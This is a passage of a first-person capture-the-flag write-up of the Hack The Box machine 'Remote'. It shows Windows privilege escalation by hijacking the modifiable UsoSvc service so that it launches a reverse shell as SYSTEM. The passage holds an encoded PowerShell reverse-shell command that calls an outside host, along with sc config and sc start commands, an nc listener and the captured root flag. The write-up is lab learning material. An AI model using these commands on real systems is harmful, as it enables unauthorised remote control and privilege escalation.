    Command Line: "powershell.exe" -exec bypass -noprofile -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4ANgA1ACcALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
   =================================================================================================
[...]
[+] Modifiable Services(T1007)
   [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
    LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s:
    UsoSvc: AllAccess, Start
[...]
   [+] Looking AppCmd.exe()
   [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
    AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials
[...]
  [+] Unnattend Files()
    C:\Windows\Panther\Unattend.xml
<Password>*SENSITIVE*DATA*DELETED*</Password>     <Enabled>true</Enabled>      <Username>administrator</Username>     </AutoLogon>    <UserAccounts>     <LocalAccounts>      <LocalAccount wcm:action="add">       <Password>*SENSITIVE*DATA*DELETED*</Password>
[...]


Well, analyze the output together:

  1. Let me say that is a strange executable in a strange location, probably something leaves there by other "colleagues".
  2. I have no idea about what can be, it seems an encrypted code that is launched using the powershell.
  3. This is interesting, one service that I can modify (identified only one of a huge of services); the specific service is UsoSvc.
  4. Also the appcmd is in the inetsrv folder and it can be used to modify the web server configuration.
  5. The last one is xml configuration file about the service that starts automatically, but the passwords are removed.

At this point I had to study a bit, I was not familiar with the commands that can be used to interact with the services (as I said several times, I'm not a systems engineer and I come from the world of programming), so I provide to make me a culture. When I understand a little, I try to retrieve information from the services and identify the specific one I can change.

c:\windows\system32\inetsrv>wmic service where name="usosvc" list full
wmic service where name="usosvc" list full


AcceptPause=FALSE
AcceptStop=FALSE
Caption=Update Orchestrator Service
CheckPoint=0
CreationClassName=Win32_Service
Description=Manages Windows Updates. If stopped, your devices will not be able download and install latest udpates.
DesktopInteract=FALSE
DisplayName=Update Orchestrator Service
ErrorControl=Normal
ExitCode=0
InstallDate=
Name=UsoSvc
PathName=c:\windows\temp\myrsadm.exe
ProcessId=0
ServiceSpecificExitCode=0
ServiceType=Share Process
Started=FALSE
StartMode=Auto
StartName=LocalSystem
State=Stopped
Status=OK
SystemCreationClassName=Win32_ComputerSystem
SystemName=REMOTE
TagId=0
WaitHint=0


Good, it is clear now the usage of the service (Description=Manage Windows Update) and is interesting to see that the service run with administrator privileges (StartName=LocalSystem). Well, the idea is to stop the service and reconfigure it so it launches a new reverse shell with administrator privileges.

I don't know if it can work, but try it and look the result. As said, you have to re-use steps already done in this tutorial, then, first, create another reverse shell with the command used before (msfvenom) but change the port; I use the port 5555 this time. It needs to differ from the previous one because you have to restart the service with the first shell. Well, the next step, create another script to upload this new reverse shell (from the 46153.py). The step is the same, you have to change only the name of the exe.

I never said, but I suppose it's implied, that the files to be downloaded from your web server have to located in the same folder where the service is running (or in the folder you have configured when you have launched your service). Good, I called my new reverse shell myrsadm.exe, so, this time I can check the download activity on the remote service from the first shell I opened... proceed.

dir c:\windows\temp\*.exe
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of c:\windows\temp

04/05/2020  10:14 AM            73,802 myrs2.exe
04/05/2020  10:49 AM            73,802 myrsadm.exe
               2 File(s)        147,604 bytes
               0 Dir(s)  19,262,758,912 bytes free


Good, exploit now. stop the service:

c:\windows\system32\inetsrv>sc stop UsoSvc                   
sc stop UsoSvc

SERVICE_NAME: UsoSvc 
        TYPE               : 30  WIN32  
        STATE              : 3  STOP_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x3
        WAIT_HINT          : 0x7530


Reconfigure it:

c:\windows\system32\inetsrv>sc config UsoSvc binpath="c:\windows\temp\myrsadm.exe"
sc config UsoSvc binpath="c:\windows\temp\myrsadm.exe"
[SC] ChangeServiceConfig SUCCESS


And relaunch it, but before, start a new listener on your machine on the port 5555. (I omit this command, is the same launched before).

c:\windows\system32\inetsrv>sc start UsoSvc
sc start UsoSvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.


c:\windows\system32\inetsrv>


If it all works fine, you will receive a connection on your second listener... and in fact...

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.180 - Remote/attack/ws-8000$ nc -lvp 5555
listening on [any] 5555 ...
10.10.10.180: inverse host lookup failed: Unknown host
connect to [10.10.14.194] from (UNKNOWN) [10.10.10.180] 49723
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>dir c:\Users\Administrator\Desktop
dir c:\Users\Administrator\Desktop
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of c:\Users\Administrator\Desktop

02/20/2020  03:41 AM    <DIR>          .
02/20/2020  03:41 AM    <DIR>          ..
04/05/2020  10:12 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  19,266,957,312 bytes free

C:\Windows\system32>more c:\Users\Administrator\Desktop\root.txt
more c:\Users\Administrator\Desktop\root.txt
b******************************6


And that's all folks!

The awesome image used in this article is called Drop The Hammer, created by Ryan Vatzlavick.